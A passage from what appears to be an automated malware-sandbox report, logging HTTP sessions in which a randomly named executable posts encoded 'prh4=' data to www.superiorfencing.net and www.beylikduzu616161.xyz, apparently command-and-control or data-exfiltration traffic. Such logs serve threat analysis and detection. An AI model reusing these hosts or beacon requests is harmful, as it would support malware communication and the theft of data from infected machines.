                                                                      17 | 192.168.2.10 | 49993 | 103.230.159.86 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:07.672748089 CET | 768 | OUT | POST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 34 32 45 46 33 48 6c 6a 65 4a 47 53 38 4e 69 33 70 6f 50 33 4e 54 6a 2b 6d 52 59 71 7a 41 2b 61 77 6a 47 5a 32 6f 73 31 4f 5a 43 6b 59 59 5a 57 37 36 47 46 45 66 78 78 38 4e 61 4f 44 47 7a 55 73 35 57 4b 59 49 31 68 53 49 66 66 42 78 56 33 4e 30 78 72 51 61 34 45 35 32 41 54 49 52 4b 72 55 35 56 71 45 36 6a 52 56 78 72 37 63 43 6b 4b 78 4f 57 6b 4d 5a 77 6a 4d 73 79 34 59 45 39 37 66 55 47 32 67 70 5a 46 71 6f 75 63 55 45 43 76 71 44 52 4d 64 62 68 31 76 39 36 4a 7a 59 4a 79 4a 64 4c 76 44 54 59 59 6a 49 37 50 6a 61 2b 6d
                                                                      Data Ascii: prh4=+cCAFC3M4Oqm42EF3HljeJGS8Ni3poP3NTj+mRYqzA+awjGZ2os1OZCkYYZW76GFEfxx8NaODGzUs5WKYI1hSIffBxV3N0xrQa4E52ATIRKrU5VqE6jRVxr7cCkKxOWkMZwjMsy4YE97fUG2gpZFqoucUECvqDRMdbh1v96JzYJyJdLvDTYYjI7Pja+m
                                                                      Nov 20, 2024 09:24:08.523195028 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:08 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      18 | 192.168.2.10 | 49994 | 103.230.159.86 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:10.219264984 CET | 792 | OUT | POST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 35 56 63 46 6e 51 78 6a 57 4a 47 56 7a 74 69 33 69 49 50 7a 4e 53 66 2b 6d 56 67 36 7a 7a 61 61 77 43 32 5a 33 70 73 31 50 5a 43 6b 54 34 59 63 6c 4b 47 4f 45 66 4e 48 38 49 69 4f 44 47 6e 55 73 38 79 4b 5a 35 31 69 54 59 66 64 41 42 56 31 53 6b 78 72 51 61 34 45 35 32 55 39 49 58 69 72 56 4b 64 71 47 59 48 57 4b 42 72 34 5a 43 6b 4b 31 4f 57 67 4d 5a 78 32 4d 74 65 47 59 48 4a 37 66 56 32 32 67 34 5a 47 39 34 76 32 62 6b 44 43 6b 32 30 2b 62 4b 31 65 6a 73 65 6d 69 49 4a 49 4f 38 32 6f 53 43 35 50 77 2f 6e 42 74 63 4c 4d 4c 71 36 42 56 4e 64 52 32 61 76 47 4f 73 2b 30 76 6e 4e 51 30 77 3d 3d
                                                                      Data Ascii: prh4=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzaawC2Z3ps1PZCkT4YclKGOEfNH8IiODGnUs8yKZ51iTYfdABV1SkxrQa4E52U9IXirVKdqGYHWKBr4ZCkK1OWgMZx2MteGYHJ7fV22g4ZG94v2bkDCk20+bK1ejsemiIJIO82oSC5Pw/nBtcLMLq6BVNdR2avGOs+0vnNQ0w==
                                                                      Nov 20, 2024 09:24:11.079086065 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:10 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      19 | 192.168.2.10 | 49995 | 103.230.159.86 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:12.761512041 CET | 1805 | OUT | POST /bwyw/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Origin: http://www.superiorfencing.net
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.superiorfencing.net/bwyw/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 2b 63 43 41 46 43 33 4d 34 4f 71 6d 35 56 63 46 6e 51 78 6a 57 4a 47 56 7a 74 69 33 69 49 50 7a 4e 53 66 2b 6d 56 67 36 7a 7a 53 61 78 30 69 5a 32 4b 55 31 64 4a 43 6b 51 34 59 64 6c 4b 47 58 45 62 68 62 38 49 2f 37 44 45 66 55 71 66 4b 4b 65 4b 74 69 63 59 66 64 4c 68 56 30 4e 30 77 72 51 62 4a 4e 35 32 45 39 49 58 69 72 56 4b 78 71 43 4b 6a 57 5a 52 72 37 63 43 6b 65 78 4f 58 46 4d 5a 6f 42 4d 74 61 57 59 78 35 37 66 31 6d 32 6a 4b 78 47 69 49 76 30 59 6b 44 61 6b 32 77 6c 62 4f 64 53 6a 73 72 42 69 4b 5a 49 4c 4b 65 30 4e 79 31 6a 68 76 36 62 74 36 50 5a 42 4b 2b 36 55 66 30 77 78 65 58 6b 4f 2b 58 6f 67 30 30 70 71 34 4b 74 6c 61 41 6e 68 51 39 78 72 4b 73 67 6c 35 6a 2b 35 69 4e 67 4d 43 67 55 31 70 5a 42 62 65 41 73 7a 65 5a 42 6e 47 73 70 69 68 74 6b 49 2b 61 35 49 73 69 77 67 61 45 34 35 4b 4b 58 6e 53 44 53 4f 41 56 37 51 51 66 79 67 6d 63 49 6a 67 76 4f 42 6a 61 73 39 71 76 4c 5a 4e 36 6a 53 77 61 6a 38 6d 63 48 41 4a 32 58 74 67 49 73 42 68 2b 77 73 55 59 4b 35 6f 6b 7a 54 [TRUNCATED]
                                                                      Data Ascii: prh4=+cCAFC3M4Oqm5VcFnQxjWJGVzti3iIPzNSf+mVg6zzSax0iZ2KU1dJCkQ4YdlKGXEbhb8I/7DEfUqfKKeKticYfdLhV0N0wrQbJN52E9IXirVKxqCKjWZRr7cCkexOXFMZoBMtaWYx57f1m2jKxGiIv0YkDak2wlbOdSjsrBiKZILKe0Ny1jhv6bt6PZBK+6Uf0wxeXkO+Xog00pq4KtlaAnhQ9xrKsgl5j+5iNgMCgU1pZBbeAszeZBnGspihtkI+a5IsiwgaE45KKXnSDSOAV7QQfygmcIjgvOBjas9qvLZN6jSwaj8mcHAJ2XtgIsBh+wsUYK5okzTKi8C/PpfkPhhdY5lqsW4+vt8vn4X4g4BEZkWAJt+ourHrDne5yBJH/4cDAvMRSCzdZtrN5x5aldOspPHde85DCsco7soAOZeAGCBr6sNjOgATjxgEkdJtYSi1oazYR7/bmSo0YzTr/aPqPLO9nhA5GXVu22GQHjeagrlldb7/z5sbjI98WJWqFe1A0LeDdSQHwORigbcPH2gBCrvnNNsMZb8QnW4UXwjKw885CtlvZP6g2DH3Xa8pXwpDc4ISCtlqZWsyHwUzsMOvcoWVlE0hcuWLKwawJekXXf7RlpNkSBsAmA25VjI+G4S8u6k0mVN1TWEK+1ROyMCRYh2y9+6juTTQtG5vfx+4gSb7H4rVvdNtExjZsoFG+99pkEKrwOACNjVu1VNkxDD6z4WBT6NtFQz59t3iju+Thgii9IxydnWShN3p5bBJ/uF5o3MSHl5X1RrtU6OQrZMJuVr74680eCnpRHHfZHGbiiAX4xhUZq6vSB1Uca4mufCYQmUwGA7HjHd3y5CaPK+R27Dut7xEiE9cc9s1tLschAKOY5JnJCzeVq+jKcBNTzQp4y3TRj4utFo39emo7H3t0ek/1nB7JDZZfRFvaXKY3nKD5WPNQuc01atuP+9WHXT39F3t15gNd1lEl6nVy8/54iBJVFJ0vWYlqBZN+J2DS [TRUNCATED]
                                                                      Nov 20, 2024 09:24:13.633373022 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:13 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      20 | 192.168.2.10 | 49996 | 103.230.159.86 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:15.302953959 CET | 500 | OUT | GET /bwyw/?prh4=zeqgG3zf3rSD22A3/l1gTLGQ/sW8joOuTT/213oW5xKBpEmM0JRqJaaJcKUMxr+7Esc9obOTS2jlvNaYH8wfdJGRHCEAKXdxR5M68AEOT1S+b5dkfA==&_VK8=7pXD8zQxGFxP HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.superiorfencing.net
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Nov 20, 2024 09:24:16.165601015 CET | 479 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:16 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      21 | 192.168.2.10 | 49997 | 188.114.97.3 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:21.241427898 CET | 771 | OUT | POST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 193
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 64 30 73 37 7a 51 51 51 72 62 36 53 66 43 6c 39 55 5a 77 6d 76 74 64 4f 58 55 69 4e 50 73 6c 6d 41 33 43 6f 67 64 67 67 30 55 51 78 56 6d 77 73 49 41 4a 65 39 34 32 6b 30 57 46 69 37 65 37 51 4e 48 76 67 33 34 7a 34 58 62 2b 75 6d 62 65 2f 4b 66 4b 41 43 65 30 44 4c 33 48 4f 78 6a 6d 41 55 4b 6d 38 58 6e 4c 50 4c 61 6d 53 32 6b 59 6f 77 55 33 6e 42 37 54 75 54 73 4a 61 5a 34 6e 43 50 73 51 5a 69 47 44 4c 2f 6f 76 53 6b 6c 6c 73 6a 38 36 4f 78 64 76 45 63 53 52 73 58 44 77 61 4a 30 53 4f 4f 4d 6a 72 55 6f 7a 4b 64 37 54 75 70 61 62 41 33 56 73 56 69 41 55 4f
                                                                      Data Ascii: prh4=d0s7zQQQrb6SfCl9UZwmvtdOXUiNPslmA3Cogdgg0UQxVmwsIAJe942k0WFi7e7QNHvg34z4Xb+umbe/KfKACe0DL3HOxjmAUKm8XnLPLamS2kYowU3nB7TuTsJaZ4nCPsQZiGDL/ovSkllsj86OxdvEcSRsXDwaJ0SOOMjrUozKd7TupabA3VsViAUO
                                                                      Nov 20, 2024 09:24:21.911703110 CET | 828 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:21 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vytrQtgBdKwlAlT9EYzT6Cw0%2Bc%2Br1ZLd27pvzb2SIoHrqxxbiEO3QCFY%2B%2F7iaBU1AvcHHEVQG0JX5Sj2G9vAXeT%2B9QqALCXjCErxAhthD%2FAtUv7qKLrqAhCoiZj1hKVEP%2BXtC9RoPMnfLEM%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570b0f6d3d0c94-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1451&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                      Data Ascii: 14
                                                                      Nov 20, 2024 09:24:21.911828995 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      22 | 192.168.2.10 | 49998 | 188.114.97.3 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:23.795907021 CET | 795 | OUT | POST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 217
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                                                                      Data Raw: 70 72 68 34 3d 64 30 73 37 7a 51 51 51 72 62 36 53 65 6d 68 39 53 34 77 6d 70 4e 64 42 4c 6b 69 4e 47 4d 6c 69 41 77 4b 6f 67 63 6b 77 33 67 38 78 56 48 41 73 4a 42 4a 65 2b 34 32 6b 73 6d 46 74 6d 4f 36 39 4e 48 69 66 33 36 33 34 58 61 65 75 6d 5a 32 2f 4b 73 69 48 4e 75 30 57 4e 33 48 41 2b 44 6d 41 55 4b 6d 38 58 6e 66 31 4c 65 4b 53 32 56 49 6f 77 77 6a 6b 50 62 54 76 53 73 4a 61 64 34 6e 47 50 73 51 76 69 48 65 51 2f 75 72 53 6b 6b 56 73 67 6f 4f 52 2f 64 75 42 53 79 52 2f 62 57 45 53 4a 56 71 32 43 64 58 43 4e 72 2f 52 58 36 75 70 34 4c 36 58 6b 69 77 62 73 47 68 6b 62 6a 2b 46 6c 32 31 53 78 61 44 62 53 50 41 2f 37 6f 71 69 77 41 3d 3d
                                                                      Data Ascii: prh4=d0s7zQQQrb6Semh9S4wmpNdBLkiNGMliAwKogckw3g8xVHAsJBJe+42ksmFtmO69NHif3634XaeumZ2/KsiHNu0WN3HA+DmAUKm8Xnf1LeKS2VIowwjkPbTvSsJad4nGPsQviHeQ/urSkkVsgoOR/duBSyR/bWESJVq2CdXCNr/RX6up4L6XkiwbsGhkbj+Fl21SxaDbSPA/7oqiwA==
                                                                      Nov 20, 2024 09:24:24.418405056 CET | 823 | IN | HTTP/1.1 404 Not Found
                                                                      Date: Wed, 20 Nov 2024 08:24:24 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      CF-Cache-Status: DYNAMIC
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jK6GRdkqr0V%2FcubRNuuDf7if%2BJagemLfpk3Qgir8VQFqkKxNWsRpTkr2sVxR0BKNkIvwM6iXmkHDZzjG3b2zNx6AZTjCDN%2FqEnKG6VD2q0FjuHfJOqnR4R%2BH2NwreTuYE7iXNUSPQV%2BfxE4%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8e570b1f2af441c3-EWR
                                                                      Content-Encoding: gzip
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2051&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=795&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                      Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
                                                                      Data Ascii: 14
                                                                      Nov 20, 2024 09:24:24.418519020 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      23 | 192.168.2.10 | 49999 | 188.114.97.3 | 80 | 6808 | C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Nov 20, 2024 09:24:26.367635012 CET | 1808 | OUT | POST /2nga/ HTTP/1.1
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Host: www.beylikduzu616161.xyz
                                                                      Origin: http://www.beylikduzu616161.xyz
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Content-Length: 1229
                                                                      Connection: close
                                                                      Referer: http://www.beylikduzu616161.xyz/2nga/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
